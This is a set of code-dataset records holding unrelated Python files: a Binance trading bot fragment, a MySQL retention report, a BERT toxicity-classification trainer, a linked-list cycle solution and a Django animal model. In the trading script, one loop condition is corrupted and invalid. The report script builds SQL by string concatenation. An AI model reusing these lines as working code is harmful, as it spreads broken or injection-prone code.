'LIMIT' in order_type: \n if 'STOP' in order_type: \n \n if side=='BUY': \n stopPrice = float_precision( float(price)*0.9999, tick_size) \n else: \n stopPrice = float_precision( float(price)*1.0001, tick_size) \n \n client.create_test_order(symbol=symbol, side=side, type='STOP_LOSS_LIMIT', timeInForce='GTC',\n stopPrice = stopPrice, price=price, quantity=quantity) \n else: \n client.create_test_order(symbol=symbol, side=side, type='LIMIT', timeInForce='GTC',\n price=price , quantity=quantity)\n \n elif 'PUMP' in order_type:\n client.create_test_order(symbol=symbol, side='BUY', type='MARKET', quantity=quantity)\n \n stop_price = float(price)*0.9999 \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n target_price = float(price)*1.0001 \n \n while current_price=stop_price: \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n print('stop', stop_price, 'price', current_price, 'target', target_price, end='\\r') \n print('')\n \n if current_price>=target_price:\n stop_price = target_price \n target_price = target_price*1.25 \n \n client.create_test_order(symbol=symbol, side='SELL', type='MARKET', quantity=quantity)\n \n if current_price>=target_price : \n print('take profit at', current_price,'percentage', round( 
(current_price/float(price)-1)*100, 2) ) \n else:\n print('stop loss at', current_price, 'percentage', round( (current_price/float(price)-1) *100, 2) ) \n \n else: \n print('live order:', side, order_type, 'symbol', symbol, 'price', price, 'quantity', quantity)\n \n if order_type == 'MARKET': \n order = client.create_order(symbol=symbol, side=side, type=order_type, quantity=quantity)\n \n elif 'LIMIT' in order_type: \n if 'STOP' in order_type: \n \n if side=='BUY': \n stopPrice = float_precision( float(price)*0.95, tick_size) \n else: \n stopPrice = float_precision( float(price)*1.25, tick_size) \n \n client.create_order(symbol=symbol, side=side, type='STOP_LOSS_LIMIT', timeInForce='GTC',\n stopPrice = stopPrice, price=price, quantity=quantity) \n else:\n client.create_order(symbol=symbol, side=side, type='LIMIT', timeInForce='GTC',\n price=price , quantity=quantity) \n \n elif 'PUMP' in order_type:\n client.create_order(symbol=symbol, side='BUY', type='MARKET', quantity=quantity) \n \n stop_price = float(price)*0.95 \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n target_price = float(price)*1.25 \n \n while current_price<target_price and current_price>=stop_price: \n current_price = float(client.get_symbol_ticker(symbol=symbol)['price']) \n print('stop', stop_price, 'price', current_price, 'target', target_price, end='\\r') \n print('')\n \n if current_price>=target_price: \n stop_price = target_price \n target_price = target_price*1.05 \n \n client.create_order(symbol=symbol, side='SELL', type='MARKET', quantity=quantity) \n \n if current_price>=target_price : \n print('take profit at', current_price,'percentage', round( (current_price/float(price)-1)*100, 2) ) \n else:\n print('stop loss at', current_price, 'percentage', round( (current_price/float(price)-1) *100, 2) ) \n \n except BinanceAPIException as error:\n print(error) \n \n except BinanceOrderException as error:\n print(error) \n \nif __name__ == '__main__':\n make_order() \n \n","sub_path":"spot/spot.py","file_name":"spot.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30522330","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : NewUserLtvByDate.py\n# @Author: MoonKuma\n# @Date : 2018/10/10\n# @Desc : Daily user increase, and their ltv\n\nimport util.EasyXls as EasyXls\nimport util.EasyMysql as EasyMysql\nimport conf.ConfParameters as ConfParameters\nimport MySQLdb\nimport xlwt\n\n\nclass NewUserLtvByDate(object):\n\n def __init__(self, start_date, end_date, *channel):\n # conf path\n self.conf_path = ConfParameters.ConfParameters().conf_path\n # initial mysql-db\n self.mysql_para = ConfParameters.ConfParameters().mysql_conf\n self.stat_base = self.mysql_para['stat_base']\n self.db = None # initialized lazily when actually used (not in the constructor) to ensure the db gets closed after connect\n self.cursor = None\n self.easy_sql = EasyMysql.EasyMysql()\n # initial xls writer\n self.wbk = xlwt.Workbook()\n self.xls_writer = EasyXls.EasyXls()\n self.style = xlwt.XFStyle()\n self.style.borders = self.xls_writer.borders\n # local parameter\n self.start_date = start_date\n self.end_date = end_date\n self.channel = ['-1']\n self.zone = ['-1']\n self.period_limit = '30'\n if len(channel) > 0:\n self.channel = list(channel[0])\n # self.date_list = DateList.DateList().get_date_list(self.start_date, self.end_date)\n\n def __select_sql_data(self, table_name, *query_type): # such functions are not exposed to the outside\n # 
table_name : user_reten_pay, user_reten_pay_openid\n # return : [reg_date_list,check_date_list,{reg_date|check_date:money}, {reg_date: reg_users}]\n reg_date_list = list()\n check_date_list = list()\n data_dict = dict()\n reg_user_dict = dict()\n #\n where_clause = ' where period<=' + str(self.period_limit) + ' and date between \\'' + self.start_date + '\\' and \\'' + self.end_date + '\\''\n if self.channel[0] != '-1':\n channel_str = self.easy_sql.sql_value_str(self.channel)\n where_clause += ' and channel in (' + channel_str + ') '\n if self.zone[0] != '-1':\n zone_str = self.easy_sql.sql_value_str(self.zone)\n where_clause += ' and zoneid in (' + zone_str + ') '\n sql_str = 'select concat(date),period,concat(date_add(date, interval period day)),sum(count),ceil(sum(money/100)) from ' + table_name + where_clause + ' group by date,period;'\n print(sql_str)\n self.cursor.execute(sql_str)\n all_data = self.cursor.fetchall()\n if all_data:\n for rec in all_data:\n reg_date = rec[0]\n check_date = str(rec[1])\n date_mark = rec[2]\n user_count = rec[3]\n money = rec[4]\n if reg_date not in reg_date_list:\n reg_date_list.append(reg_date)\n if check_date not in check_date_list:\n check_date_list.append(check_date)\n key = reg_date + '|' + check_date\n if key not in data_dict.keys():\n if len(query_type) == 0 or query_type[0] == 'ltv':\n data_dict[key] = int(money)\n elif query_type[0] == 'reten':\n data_dict[key] = int(user_count)\n if reg_date == date_mark:\n reg_user_dict[reg_date] = int(user_count)\n reg_date_list = sorted(reg_date_list)\n check_date_list = sorted(check_date_list, key=lambda x: int(x))\n log = 'Sql query finished, with len(reg_date_list): ' + str(len(reg_date_list)) + ', len(check_date_list):' + str(len(check_date_list)) + ', len(data_dict.keys()):' + str(len(data_dict.keys())) + ', len(reg_user_dict.keys()):' + str(len(reg_user_dict.keys()))\n print(log)\n return [reg_date_list, check_date_list, data_dict, reg_user_dict]\n\n def __write_ltv_sheet(self, table_name, sheet_name, *query_type):\n # sql data\n [reg_date_list, check_date_list, data_dict, reg_user_dict] = self.__select_sql_data(table_name, *query_type)\n # write sheet\n sheet = self.xls_writer.new_sheet(sheet_name, self.wbk)\n line_num = [0]\n sheet.col(0).width = 256 * 20\n # title\n name_list = [sheet_name]\n self.xls_writer.insert_xls_style(name_list, sheet, line_num, self.style)\n line_num[0] = line_num[0] + 2\n # head\n head_line = ['注册日期', '注册人数']\n for date in check_date_list:\n date_str = '第' + str(int(date)+1) + '日'\n head_line.append(date_str)\n self.xls_writer.insert_xls_style(head_line, sheet, line_num, self.style)\n # content\n for reg_date in reg_date_list:\n data_line = list()\n data_line.append(reg_date)\n reg_user = reg_user_dict.setdefault(reg_date, 0)\n data_line.append(reg_user)\n if reg_user == 0:\n reg_user = 1\n for check_date in check_date_list:\n key = reg_date + '|' + check_date\n if key not in data_dict.keys():\n data_line.append('')\n continue\n ltv = round(data_dict.setdefault(key, 0)/float(reg_user), 2)\n data_line.append(ltv)\n self.xls_writer.insert_xls_style(data_line, sheet, line_num, self.style)\n\n def execute(self, file_name):\n # file_name = ConfParameters.ConfParameters().save_path + 'User_diamond_' + self.start_date + '-' + self.end_date + '.xls'\n self.db = MySQLdb.connect(self.mysql_para['ip'], self.mysql_para['users'], self.mysql_para['password'],\n self.mysql_para['stat_base'])\n self.cursor = self.db.cursor()\n try:\n self.zone = [10001]\n self.channel = [1045]\n 
self.__write_ltv_sheet('user_reten_pay', '1服UID新增按日留存', 'reten')\n self.wbk.save(file_name)\n finally:\n self.db.close()\n\n\n# Main\nif __name__ == '__main__':\n start = '2018-03-28'\n end = '2018-05-18'\n\n channel_name = 'IOS'\n save_name = ConfParameters.ConfParameters().save_path + 'NewUserLtvRetenByDate_' + start + '_' + end + '_' + channel_name + '.xls'\n # NewUserLtvByDate(start, end, channel_id).execute(save_name)\n NewUserLtvByDate(start, end).execute(save_name)\n","sub_path":"NewUserLtvByDate.py","file_name":"NewUserLtvByDate.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"137646532","text":"import argparse\nimport json\nimport shutil\nfrom collections import OrderedDict\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Dict\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport tqdm\nfrom apex import amp\nfrom pytorch_pretrained_bert import BertAdam, BertTokenizer\nfrom pytorch_pretrained_bert import BertForSequenceClassification\nfrom sklearn.metrics import roc_auc_score\nfrom torch import nn\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom utils import (\n BucketBatchSampler,\n get_learning_rate, set_seed,\n write_event, load_model)\n\n# loss1\ndef custom_loss(pred, targets, loss_weight):\n bce_loss_1 = nn.BCEWithLogitsLoss(weight=targets[:, 1:2])(pred[:, :1], targets[:, :1])\n bce_loss_2 = nn.BCEWithLogitsLoss()(pred[:, 1:], targets[:, 2:])\n return (bce_loss_1 * loss_weight) + bce_loss_2\n\n# loss2\ndef custom_loss2(pred, targets, loss_weight):\n p_mean = 0.6568\n n_mean = 0.0549\n p_squ = 0.45082\n n_squ = 0.01456\n\n pred_ = pred[:, :1]\n P = targets[:, :1] != 0\n N = targets[:, :1] == 0\n\n x_p, x_n = pred_[P], pred_[N]\n if not x_p.size()[0]:\n mean_p = p_mean\n squ_p = p_squ\n else:\n mean_p = x_p.mean()\n squ_p = (x_p * x_p).mean()\n\n if not x_n.size():\n mean_n = n_mean\n squ_n = n_squ\n else:\n mean_n = x_n.mean()\n squ_n = (x_n * x_n).mean()\n\n bce_loss_1 = nn.BCEWithLogitsLoss(weight=targets[:, 1:2])(pred[:, :1], targets[:, :1])\n bce_loss_2 = nn.BCEWithLogitsLoss()(pred[:, 1:], targets[:, 2:])\n # extra_loss_1 = torch.log(torch.exp(mean_n - mean_p) + 1)\n extra_loss_1 = mean_n - mean_p + 1\n\n return (bce_loss_1 * loss_weight) + bce_loss_2 + extra_loss_1 * 0.1\n\n\ndef convert_one_line(text, max_seq_length=None, tokenizer=None, split_point=0.25):\n max_seq_length -= 2\n tokens_a = tokenizer.tokenize(text)\n int_split = int(split_point * max_seq_length)\n if len(tokens_a) > max_seq_length:\n tokens_a = tokens_a[:int_split] + tokens_a[int_split - max_seq_length:]\n one_token = tokenizer.convert_tokens_to_ids(\n [\"[CLS]\"] + tokens_a + [\"[SEP]\"]) # +[0] * (max_seq_length - len(tokens_a))\n return one_token\n\n\nclass TrainDataset(Dataset):\n\n def __init__(self, text, lens, target, identity_df, weights, model=\"mybert\", split_point=0.25, do_lower_case=True):\n super(TrainDataset, self).__init__()\n\n self._text = text\n self._lens = lens\n self._target = target\n self._identity_df = identity_df\n self._weights = weights\n self._split_point = split_point\n VOCAB_PATH = Path('../input/torch-bert-weights/%s/vocab.txt' % (model))\n\n self._tokenizer = BertTokenizer.from_pretrained(\n VOCAB_PATH, cache_dir=None, do_lower_case=do_lower_case)\n\n def __len__(self):\n return len(self._text)\n\n 
def __getitem__(self, idx):\n text = self._text[idx]\n lens = self._lens[idx]\n target = self._target[idx]\n # identity_df = self._identity_df.iloc[[idx], :]\n weight = self._weights[idx]\n return torch.LongTensor(convert_one_line(text, max_seq_length=220, tokenizer=self._tokenizer,\n split_point=self._split_point)), lens, target, weight\n\n\ndef collate_fn(batch):\n text, lens, targets, weights = zip(*batch)\n # identity_df = pd.concat(list(identitys)).reset_index(drop=True)\n text = pad_sequence(text, batch_first=True)\n lens = torch.LongTensor(lens)\n weights = torch.FloatTensor(weights)\n targets = torch.FloatTensor(targets)\n return text, lens, targets, weights\n\n\nclass BertModel(nn.Module):\n\n def __init__(self, pretrain_path, dropout=0.1):\n super(BertModel, self).__init__()\n self.bert = BertForSequenceClassification.from_pretrained(pretrain_path, cache_dir=None, num_labels=1)\n self.aux_head = nn.Sequential(\n OrderedDict([\n ('dropout', nn.Dropout(dropout)),\n ('clf', nn.Linear(self.bert.config.hidden_size, 6)),\n ])\n )\n self.main_head = nn.Sequential(\n OrderedDict([\n ('dropout', nn.Dropout(dropout)),\n ('clf', nn.Linear(self.bert.config.hidden_size, 1))\n ])\n )\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None):\n _, pooled_output = self.bert.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False)\n aux_logits = self.aux_head(pooled_output)\n main_logits = self.main_head(pooled_output)\n out = torch.cat([main_logits, aux_logits], 1)\n return out\n\n\nclass JigsawEvaluator:\n\n def __init__(self, y_true, y_identity, power=-5, overall_model_weight=0.25, identity_columns=None):\n self.y = (y_true >= 0.5).astype(int)\n self.y_i = (y_identity >= 0.5).astype(int)\n self.n_subgroups = self.y_i.shape[1]\n self.power = power\n self.overall_model_weight = overall_model_weight\n self.identity_columns = identity_columns\n\n @staticmethod\n def _compute_auc(y_true, y_pred):\n try:\n return roc_auc_score(y_true, y_pred)\n except ValueError:\n return np.nan\n\n def _compute_subgroup_auc(self, i, y_pred):\n mask = self.y_i[:, i] == 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def _compute_bpsn_auc(self, i, y_pred):\n mask = self.y_i[:, i] + self.y == 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def _compute_bnsp_auc(self, i, y_pred):\n mask = self.y_i[:, i] + self.y != 1\n return self._compute_auc(self.y[mask], y_pred[mask])\n\n def compute_bias_metrics_for_model(self, y_pred):\n records = []\n # records = np.zeros((3, self.n_subgroups))\n for i in range(self.n_subgroups):\n record = dict()\n record['subgroup_auc'] = self._compute_subgroup_auc(i, y_pred)\n record['bpsn_auc'] = self._compute_bpsn_auc(i, y_pred)\n record['bnsp_auc'] = self._compute_bnsp_auc(i, y_pred)\n # records[0, i] = self._compute_subgroup_auc(i, y_pred)\n # records[1, i] = self._compute_bpsn_auc(i, y_pred)\n # records[2, i] = self._compute_bnsp_auc(i, y_pred)\n records.append(record)\n return pd.DataFrame(records, index=self.identity_columns)\n\n def _calculate_overall_auc(self, y_pred):\n return roc_auc_score(self.y, y_pred)\n\n def _power_mean(self, array):\n total = sum(np.power(array, self.power))\n return np.power(total / len(array), 1 / self.power)\n\n def get_final_metric(self, y_pred):\n bias_metrics = self.compute_bias_metrics_for_model(y_pred)\n bias_score = np.average([\n # self._power_mean(bias_metrics[0]),\n # self._power_mean(bias_metrics[1]),\n # self._power_mean(bias_metrics[2])\n 
self._power_mean(bias_metrics['subgroup_auc']),\n self._power_mean(bias_metrics['bpsn_auc']),\n self._power_mean(bias_metrics['bnsp_auc'])\n ])\n overall_score = self.overall_model_weight * self._calculate_overall_auc(y_pred)\n bias_score = (1 - self.overall_model_weight) * bias_score\n return overall_score + bias_score, bias_metrics\n\n\ndef main():\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg('mode', choices=['train', 'validate', 'predict', 'train_all'])\n arg('run_root')\n arg('--model', default='mybert')\n arg('--pretrained', type=int, default=0)\n arg('--batch-size', type=int, default=32)\n arg('--step', type=int, default=1)\n arg('--workers', type=int, default=2)\n arg('--lr', type=float, default=0.0002)\n arg('--patience', type=int, default=4)\n arg('--clean', action='store_true')\n arg('--n-epochs', type=int, default=1)\n arg('--kloss', type=float, default=1.0)\n arg('--loss_fn', default='loss1')\n arg('--fold_name', default='/folds_binary_weights_kernal.pkl')\n arg('--limit', type=int)\n arg('--fold', type=int, default=0)\n arg('--multi-gpu', type=int, default=0)\n arg('--lr_layerdecay', type=float, default=0.95)\n arg('--warmup', type=float, default=0.05)\n arg('--split_point', type=float, default=0.3)\n arg('--bsample', type=bool, default=False)\n arg('--do_lower_case', type=bool, default=True)\n args = parser.parse_args()\n\n set_seed()\n BERT_PRETRAIN_PATH = '../input/torch-bert-weights/%s/' % (args.model)\n run_root = Path('../experiments/' + args.run_root)\n DATA_ROOT = Path('../input/jigsaw-unintended-bias-in-toxicity-classification')\n\n folds = pd.read_pickle(str(DATA_ROOT) + args.fold_name)\n print(folds['weights'].mean())\n\n identity_columns = ['male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish',\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n\n if args.mode == \"train_all\":\n train_fold = folds\n else:\n train_fold = folds[folds['fold'] != args.fold]\n valid_fold = folds[folds['fold'] == args.fold]\n valid_fold = valid_fold.sort_values(by=[\"len\"])\n\n if args.limit:\n train_fold = train_fold[:args.limit]\n if args.mode != \"train_all\":\n valid_fold = valid_fold[:args.limit * 3]\n\n if args.mode == \"train_all\":\n valid_df = None\n else:\n valid_df = valid_fold[identity_columns + [\"target\"]]\n\n loss_weight = 1 / folds['weights'].mean() * args.kloss\n\n if args.loss_fn == \"loss1\":\n loss_fn = custom_loss\n elif args.loss_fn == \"loss2\":\n loss_fn = custom_loss2\n\n criterion = partial(loss_fn, loss_weight=loss_weight)\n\n if args.mode == 'train' or args.mode == \"train_all\":\n if run_root.exists() and args.clean:\n shutil.rmtree(run_root)\n run_root.mkdir(exist_ok=True, parents=True)\n (run_root / 'params.json').write_text(\n json.dumps(vars(args), indent=4, sort_keys=True))\n\n training_set = TrainDataset(train_fold['comment_text'].tolist(), lens=train_fold['len'].tolist(),\n target=train_fold[['binary_target', 'weights', 'target', 'severe_toxicity',\n 'obscene', 'identity_attack', 'insult',\n 'threat']].values.tolist(),\n identity_df=train_fold[identity_columns], weights=train_fold['weights'].tolist(),\n model=args.model, split_point=args.split_point, do_lower_case=args.do_lower_case)\n if args.bsample:\n bbsampler = BucketBatchSampler(training_set, batch_size=args.batch_size, drop_last=True,\n sort_key=lambda x: x[1], biggest_batches_first=None,\n bucket_size_multiplier=100, shuffle=True)\n batchsize = 1\n shuffle = False\n\n else:\n bbsampler = None\n batchsize = args.batch_size\n shuffle = 
True\n\n training_loader = DataLoader(training_set, batch_sampler=bbsampler, collate_fn=collate_fn,\n num_workers=args.workers, batch_size=batchsize, shuffle=shuffle)\n\n if args.mode == \"train\":\n valid_set = TrainDataset(valid_fold['comment_text'].tolist(), lens=valid_fold['len'].tolist(),\n target=valid_fold['binary_target'].values.tolist()\n , identity_df=valid_fold[identity_columns], weights=valid_fold['weights'].tolist(),\n model=args.model, split_point=args.split_point, do_lower_case=args.do_lower_case)\n valid_loader = DataLoader(valid_set, batch_size=args.batch_size, shuffle=False, collate_fn=collate_fn,\n num_workers=args.workers)\n else:\n valid_loader = None\n\n model = BertModel(BERT_PRETRAIN_PATH)\n model.cuda()\n\n if args.model in [\"bert-base-uncased\", \"bert-base-cased\", \"mybert\", \"gpt2\", 'mybert-base-cased',\n 'mybert-base-uncased']:\n NUM_LAYERS = 12\n elif args.model in [\"bert-large-uncased\", \"bert-large-cased\", \"mybertlarge\", \"wmm\", \"mybertlargecased\",\n \"wwmcased\", \"mybert-large-uncased\", 'mybert-wwm-uncased']:\n NUM_LAYERS = 24\n else:\n raise ValueError(args.model+' is a invalid model name')\n\n optimizer_grouped_parameters = [\n {'params': model.bert.bert.embeddings.parameters(), 'lr': args.lr * (args.lr_layerdecay ** NUM_LAYERS)},\n {'params': model.main_head.parameters(), 'lr': args.lr},\n {'params': model.aux_head.parameters(), 'lr': args.lr},\n {'params': model.bert.bert.pooler.parameters(), 'lr': args.lr}\n ]\n\n for layer in range(NUM_LAYERS):\n optimizer_grouped_parameters.append(\n {'params': model.bert.bert.encoder.layer.__getattr__('%d' % (NUM_LAYERS - 1 - layer)).parameters(),\n 'lr': args.lr * (args.lr_layerdecay ** layer)},\n )\n optimizer = BertAdam(optimizer_grouped_parameters, lr=args.lr, warmup=args.warmup,\n t_total=len(training_loader) // args.step)\n\n scheduler = ReduceLROnPlateau(optimizer, patience=0, factor=0.1, verbose=True, mode='max', min_lr=1e-7)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O2\", verbosity=0)\n\n optimizer.zero_grad()\n\n if args.multi_gpu == 1:\n model = nn.DataParallel(model)\n\n train(args, model, optimizer, scheduler, criterion,\n train_loader=training_loader,\n valid_df=valid_df, valid_loader=valid_loader, epoch_length=len(training_set))\n\n elif args.mode == 'validate':\n\n valid_set = TrainDataset(valid_fold['comment_text'].tolist(), lens=valid_fold['len'].tolist(),\n target=valid_fold[['binary_target']].values.tolist(),\n identity_df=valid_fold[identity_columns],\n weights=valid_fold['weights'].tolist(), model=args.model, split_point=args.split_point,\n do_lower_case=args.do_lower_cased)\n valid_loader = DataLoader(valid_set, batch_size=args.batch_size, shuffle=False, collate_fn=collate_fn,\n num_workers=args.workers)\n model = BertModel(BERT_PRETRAIN_PATH)\n load_model(model, run_root / ('best-model-%d.pt' % args.fold), multi2single=False)\n model.cuda()\n\n optimizer = BertAdam(model.parameters(), lr=1e-5, warmup=0.95)\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O2\", verbosity=0)\n\n if args.multi_gpu == 1:\n model = nn.DataParallel(model)\n\n validation(model, criterion, valid_df, valid_loader, args, save_result=True, progress=True)\n\n\ndef train(args, model: nn.Module, optimizer, scheduler, criterion, *,\n train_loader, valid_df, valid_loader, epoch_length, patience=1,\n n_epochs=None) -> bool:\n n_epochs = n_epochs or args.n_epochs\n\n run_root = Path('../experiments/' + args.run_root)\n model_path = run_root / ('model-%d.pt' % 
args.fold)\n best_model_path = run_root / ('best-model-%d.pt' % args.fold)\n if best_model_path.exists():\n state, best_valid_score = load_model(model, best_model_path)\n start_epoch = state['epoch']\n best_epoch = start_epoch\n else:\n best_valid_score = 0\n start_epoch = 0\n best_epoch = 0\n step = 0\n\n if args.mode == \"train_all\":\n current_score = 0.95\n\n save = lambda ep: torch.save({\n 'model': model.module.state_dict() if args.multi_gpu == 1 else model.state_dict(),\n 'epoch': ep,\n 'step': step,\n 'best_valid_loss': current_score\n }, str(model_path))\n #\n report_each = 10000\n log = run_root.joinpath('train-%d.log' % args.fold).open('at', encoding='utf8')\n\n for epoch in range(start_epoch, start_epoch + n_epochs):\n model.train()\n\n lr = get_learning_rate(optimizer)\n tq = tqdm.tqdm(total=epoch_length)\n tq.set_description(f'Epoch {epoch}, lr {lr}')\n losses = []\n\n mean_loss = 0\n for i, (inputs, _, targets, weights) in enumerate(train_loader):\n attention_mask = (inputs > 0).cuda()\n inputs, targets, weights = inputs.cuda(), targets.cuda(), weights.unsqueeze(1).cuda()\n\n outputs = model(inputs, attention_mask=attention_mask, labels=None)\n\n loss = criterion(outputs, targets) / args.step\n batch_size = inputs.size(0)\n if (i + 1) % args.step == 0:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n else:\n with amp.scale_loss(loss, optimizer, delay_unscale=True) as scaled_loss:\n scaled_loss.backward()\n\n tq.update(batch_size)\n losses.append(loss.item() * args.step)\n mean_loss = np.mean(losses[-report_each:])\n tq.set_postfix(loss=f'{mean_loss:.5f}')\n if i and i % report_each == 0:\n write_event(log, step, loss=mean_loss)\n\n write_event(log, step, epoch=epoch, loss=mean_loss)\n tq.close()\n\n if args.mode == \"train\":\n valid_metrics = validation(model, criterion, valid_df, valid_loader, args)\n write_event(log, step, **valid_metrics)\n current_score = valid_metrics['score']\n save(epoch + 1)\n if scheduler is not None and args.mode == \"train\":\n scheduler.step(current_score)\n\n if args.mode == \"train\":\n if current_score > best_valid_score:\n best_valid_score = current_score\n shutil.copy(str(model_path), str(best_model_path))\n best_epoch = epoch\n else:\n pass\n return True\n\n\ndef validation(model: nn.Module, criterion, valid_df, valid_loader, args, save_result=True, progress=True) -> Dict[\n str, float]:\n run_root = Path('../experiments/' + args.run_root)\n model.eval()\n all_losses, all_predictions, all_targets = [], [], []\n if progress:\n tq = tqdm.tqdm(total=len(valid_df))\n with torch.no_grad():\n for inputs, _, targets, weights in valid_loader:\n if progress:\n batch_size = inputs.size(0)\n tq.update(batch_size)\n all_targets.append(targets.numpy().copy())\n attention_mask = (inputs > 0).cuda()\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs, attention_mask=attention_mask, labels=None)\n outputs = outputs[:, 0].view(-1, 1)\n loss = nn.BCEWithLogitsLoss()(outputs, targets.view(-1, 1)) # *N_CLASSES\n all_losses.append(loss.item()) # _reduce_loss\n predictions = torch.sigmoid(outputs)\n all_predictions.append(predictions.cpu().numpy())\n\n all_predictions = np.concatenate(all_predictions)\n all_targets = np.concatenate(all_targets)\n\n if save_result:\n np.save(run_root / 'prediction_fold{}.npy'.format(args.fold), all_predictions)\n np.save(run_root / 'target_fold{}.npy'.format(args.fold), all_targets)\n\n identity_columns = [\n 'male', 'female', 
'homosexual_gay_or_lesbian', 'christian', 'jewish',\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n y_true = valid_df['target'].values\n y_identity = valid_df[identity_columns].values\n\n evaluator = JigsawEvaluator(y_true, y_identity, identity_columns=identity_columns)\n\n score, bias_metrics = evaluator.get_final_metric(all_predictions)\n if progress:\n tq.close()\n\n metrics = dict()\n metrics['loss'] = np.mean(all_losses)\n metrics['score'] = score\n to_print = []\n for idx, (k, v) in enumerate(sorted(metrics.items(), key=lambda kv: -kv[1])):\n to_print.append(f'{k} {v:.5f}')\n print(' | '.join(to_print))\n metrics[\"bias\"] = bias_metrics.to_json()\n return metrics\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bert/main_bert.py","file_name":"main_bert.py","file_ext":"py","file_size_in_byte":20467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"326397965","text":"'''\nhttp://fisherlei.blogspot.com/2013/11/leetcode-linked-list-cycle-ii-solution.html\n\n还是采用一个走一步,一个走两步的办法\n\n1 -> 2 -> ... -> x-1 -> x -> x+1 -> ... -> x+k -> ... -> x+y -| \n ^ |\n |-------------------------------|\n \n假设在 x+k 相遇\nt = x + n*y + k\n2t = x + m*y + k\n\n2x + 2ny + 2k = x + my + k\nx + k = (m - 2n) * y\n\n等于说,两个指针相遇以后,再往下走 x 步就回到Cycle的起点了\n'''\n\nclass Solution:\n \"\"\"\n @param: head: The first node of linked list.\n @return: The node where the cycle begins. if there is no cycle, return null\n \"\"\"\n def detectCycle(self, head):\n # write your code here\n if head is None:\n return None\n node1 = head\n node2 = head\n while node2.next and node2.next.next:\n node1 = node1.next\n node2 = node2.next.next\n if node1 is node2:\n break\n if node2.next is None or node2.next.next is None:\n return None\n # go x step\n node1 = head\n while node1 is not node2:\n node1 = node1.next\n node2 = node2.next\n return node1","sub_path":"Lintcode-ladder/LinkedList/linkedListCycleII.py","file_name":"linkedListCycleII.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"166325112","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nfrom base.models import BaseModel\nfrom kennels.models import Kennel\n\n\nclass BaseAnimal(BaseModel):\n GENDER_MALE = 'male'\n GENDER_FEMALE = 'female'\n\n GENDER_CHOICES = (\n (GENDER_MALE, 'male'),\n (GENDER_FEMALE, 'female'),\n )\n\n # ANIMAL_CHOICES = (\n # ('dogs', 'dogs'),\n # ('cats', 'cats'),\n # )\n\n type = models.CharField(max_length=100, choices=Kennel.TYPE_CHOICES, null=True, blank=True)\n full_name = models.CharField(max_length=256, blank=True, null=True)\n home_name = models.CharField(max_length=100, blank=True, null=True)\n birthday = models.DateField(blank=True, null=True)\n deathday = models.DateField(blank=True, null=True)\n kennel_of_birth = models.ForeignKey('kennels.Kennel', null=True, blank=True, related_name='kennel_birth',\n on_delete=models.SET_NULL)\n kennel_live = models.ForeignKey('kennels.Kennel', null=True, blank=True, related_name='kennel_live',\n on_delete=models.SET_NULL)\n owner = models.ForeignKey(User, blank=True, null=True,\n on_delete=models.CASCADE)\n mother = models.ForeignKey('self', null=True, blank=True, related_name='mother_dog',\n on_delete=models.SET_NULL)\n father = models.ForeignKey('self', null=True, blank=True, related_name='father_dog',\n on_delete=models.SET_NULL)\n breed = 
models.ForeignKey('breeds.Breed', null=True, blank=True,\n                               on_delete=models.SET_NULL)\n    color = models.CharField(max_length=50, null=True, blank=True)\n    height = models.CharField(max_length=50, blank=True, null=True)\n    registry = models.CharField(max_length=50, null=True, blank=True)\n    pedigree = models.URLField(null=True, blank=True)\n\n    entitlements = models.CharField(max_length=2048, null=True, blank=True)\n\n    gender = models.CharField(max_length=100, choices=GENDER_CHOICES, null=True, blank=True)\n\n    achievements = models.CharField(max_length=2048, null=True, blank=True)\n\n    elbow_ed = models.CharField(max_length=2048, null=True, blank=True)\n    hip_hd = models.CharField(max_length=2048, null=True, blank=True)\n    tattoo = models.CharField(max_length=50, null=True, blank=True)\n\n    dna_data = models.CharField(max_length=2048, null=True, blank=True)\n\n    microchip = models.CharField(max_length=50, null=True, blank=True)\n\n    photo = models.ImageField(upload_to='images/%Y/%m/%d', blank=True, null=True)\n\n    about = models.CharField(max_length=10000, blank=True, null=True)\n    slug = models.CharField(max_length=256, blank=True, null=True)\n    is_owner = models.BooleanField(default=False)\n\n    class Meta:\n        db_table = 'kennel_animal'\n        verbose_name = _('Animal')\n        verbose_name_plural = _('Animals')\n\n    def humanize_type(self):\n        return dict(Kennel.TYPE_CHOICES).get(self.type)\n\n    def humanize_gender(self):\n        return dict(self.GENDER_CHOICES).get(self.gender)\n\n    def __str__(self):\n        return u'%s' % (self.full_name)","sub_path":"animals/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 